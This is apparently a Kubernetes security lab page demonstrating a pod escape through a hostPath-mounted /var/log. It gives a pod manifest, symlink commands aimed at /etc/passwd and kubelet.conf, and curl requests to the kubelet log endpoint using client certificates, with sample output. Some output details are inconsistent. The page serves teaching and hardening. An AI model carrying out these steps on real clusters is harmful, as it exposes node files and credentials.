pod_escape_log

Pod Log Escape via hostPath Symlink Manipulation

This document demonstrates a security vulnerability where a pod with hostPath access to /var/log can manipulate log files of other pods on the same node. By replacing a target pod's log file (e.g., 0.log) with a symbolic link to a sensitive file on the node (like /etc/passwd or /etc/kubernetes/kubelet.conf), an attacker can potentially read these sensitive files by accessing the logs through the Kubelet's log endpoint.

Caution: Granting pods hostPath access, especially to sensitive directories like /var/log, carries significant security risks. This example illustrates one such risk. Always follow the principle of least privilege.

1. Attacker Pod Setup (`escaper`)

First, we deploy a pod (escaper) that mounts the node's /var/log directory into its own /var/log/host path.

Create the escaper Pod manifest (escaper.yaml):

cat << EOF > escaper.yaml
apiVersion: v1
kind: Pod
metadata:
  name: escaper
spec:
  containers:
  - name: escaper
    image: nginx # Any image that allows shell access can be used
    volumeMounts:
    - name: logs
      mountPath: /var/log/host
  # nodeSelector: # Optionally, select a specific node to run this pod on
  #   kubernetes.io/hostname: your-target-node
  volumes:
  - name: logs
    hostPath:
      path: /var/log/ # Mounts the entire /var/log from the host
      type: Directory
EOF

Deploy the escaper Pod:
```
kubectl create -f escaper.yaml
```

2. Targeting Another Pod's Logs

Next, from within the escaper pod, we will navigate to the log directory of a target pod and replace its log files with symbolic links to sensitive files on the node.

Access the escaper pod's shell:
```
kubectl exec -it escaper -- bash
```
Inside the escaper pod, perform the following:
- Navigate to the host's pod log directory:
  cd /var/log/host/pods/
- List available pod log directories to identify a target. Each directory here typically corresponds to NAMESPACE_POD-NAME_POD-UID.
  ls -l
- Choose a target pod's log directory and container log subdirectory. Each pod log directory is typically named in the format NAMESPACE_PODNAME_PODUID. For example, if you find a directory named default_victim-pod_some-uid and it has a container log subdirectory victim-container, you would:
  # Example: cd default_victim-pod_some-uid/victim-container/ cd NAMESPACE_PODNAME_PODUID/CONTAINER_NAME/
  (Replace NAMESPACE_PODNAME_PODUID and CONTAINER_NAME with actual names from your environment.)
- Manipulate the log files. For instance, replace 0.log with a symlink to /etc/passwd and 1.log with a symlink to /etc/kubernetes/kubelet.conf. You might need to remove existing log files first.
  # (Optional) Remove existing log files if they are not already symlinks # rm 0.log # rm 1.log ln -sf /etc/passwd 0.log ln -sf /etc/kubernetes/kubelet.conf 1.log # For demonstration, also copy /etc/passwd to a file named 'passwd_copy_test' in the same directory cp /etc/passwd passwd_copy_test
  (Corrected "passswd" to "passwd". Used ln -sf for force overwrite if link exists.)
- Exit the escaper pod's shell:
  exit

3. Attempting Access via API Server (`kubectl logs`)

Attempting to read the manipulated logs via kubectl logs (which goes through the Kubernetes API server) will likely fail or show an error, as the API server expects actual log files, not arbitrary file content via symlinks that point outside the standard log structure.

Identify the target pod and its namespace. (This is the pod whose logs you manipulated, e.g., victim-pod in namespace default).
```
kubectl get po -n YOUR_NAMESPACE
```
Attempt to fetch logs:
```
# Replace YOUR_POD_NAME and YOUR_NAMESPACE accordingly
kubectl logs YOUR_POD_NAME -n YOUR_NAMESPACE
```
You will likely see an error message, such as "unsupported log format" or similar, because the content of /etc/passwd is not what kubectl logs expects.

4. Direct Access via Kubelet Log Endpoint

The Kubelet on each node also serves logs directly via an HTTPS endpoint (typically port 10250). If an attacker can reach this endpoint with appropriate credentials (often found on the node, e.g., /etc/kubernetes/pki/apiserver-kubelet-client.key and .crt), they can read the content of the files pointed to by the symbolic links.

Note: The following commands are typically run from the Kubernetes node itself or a machine that has network access to the node's Kubelet port and possesses the necessary client certificates.

Identify the target node's IP address (e.g., 10.10.2.35 in the original example) and the full path to the manipulated log file as seen by the Kubelet. This path is usually /var/log/pods/NAMESPACE_POD-NAME_POD-UID/CONTAINER-NAME/X.log.

Use curl to fetch the content: Replace NODE_IP, NAMESPACE_PODNAME_PODUID, and CONTAINER_NAME with actual values.

To get the content of /etc/passwd (linked to 0.log):

sudo curl -kv --key /etc/kubernetes/pki/apiserver-kubelet-client.key \
           --cert /etc/kubernetes/pki/apiserver-kubelet-client.crt \
           https://NODE_IP:10250/logs/pods/NAMESPACE_PODNAME_PODUID/CONTAINER_NAME/0.log

To get the content of /etc/kubernetes/kubelet.conf (linked to 1.log):

sudo curl -kv --key /etc/kubernetes/pki/apiserver-kubelet-client.key \
           --cert /etc/kubernetes/pki/apiserver-kubelet-client.crt \
           https://NODE_IP:10250/logs/pods/NAMESPACE_PODNAME_PODUID/CONTAINER_NAME/1.log

To get the content of the copied passwd_copy_test file:

sudo curl -kv --key /etc/kubernetes/pki/apiserver-kubelet-client.key \
           --cert /etc/kubernetes/pki/apiserver-kubelet-client.crt \
           https://NODE_IP:10250/logs/pods/NAMESPACE_PODNAME_PODUID/CONTAINER_NAME/passwd_copy_test

Example `curl` Output

The following is an example of verbose output from one such curl command, showing successful retrieval of file content (in this case, resembling /etc/passwd):

*   Trying 10.10.2.35...
* TCP_NODELAY set
* Connected to 10.10.2.35 (10.10.2.35) port 10250 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/certs/ca-certificates.crt
  CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
# ... (omitted many lines of TLS handshake details for brevity)
* SSL connection using TLSv1.3 / TLS_AES_128_GCM_SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=ip-10-10-2-35@1591785038
*  start date: Jun 10 09:30:37 2020 GMT
*  expire date: Jun 10 09:30:37 2021 GMT
*  issuer: CN=ip-10-10-2-35-ca@1591785038
*  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x56195ff56580)
> GET /logs/pods/NAMESPACE_PODNAME_PODUID/CONTAINER_NAME/0.log HTTP/2
> Host: NODE_IP:10250
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/2 200
< accept-ranges: bytes
< content-type: text/plain; charset=utf-8
< last-modified: Wed, 10 Jun 2020 10:25:23 GMT # Timestamp of the original file
< content-length: 832 # Size of the original file
< date: Thu, 11 Jun 2020 14:30:02 GMT
<
root:*:18273:0:99999:7:::
daemon:*:18273:0:99999:7:::
bin:*:18273:0:99999:7:::
# ... (content of the linked file, e.g., /etc/passwd)
* Connection #0 to host NODE_IP left intact

(Marked as text and generalized placeholders. Also added comments for clarity.)

Home

Previousnginx_mount_issue Nextrbac_lab

Last updated 6 months ago

Pod Log Escape via hostPath Symlink Manipulation

1. Attacker Pod Setup (escaper)

2. Targeting Another Pod's Logs

3. Attempting Access via API Server (kubectl logs)

4. Direct Access via Kubelet Log Endpoint

Example curl Output

1. Attacker Pod Setup (`escaper`)

3. Attempting Access via API Server (`kubectl logs`)

Example `curl` Output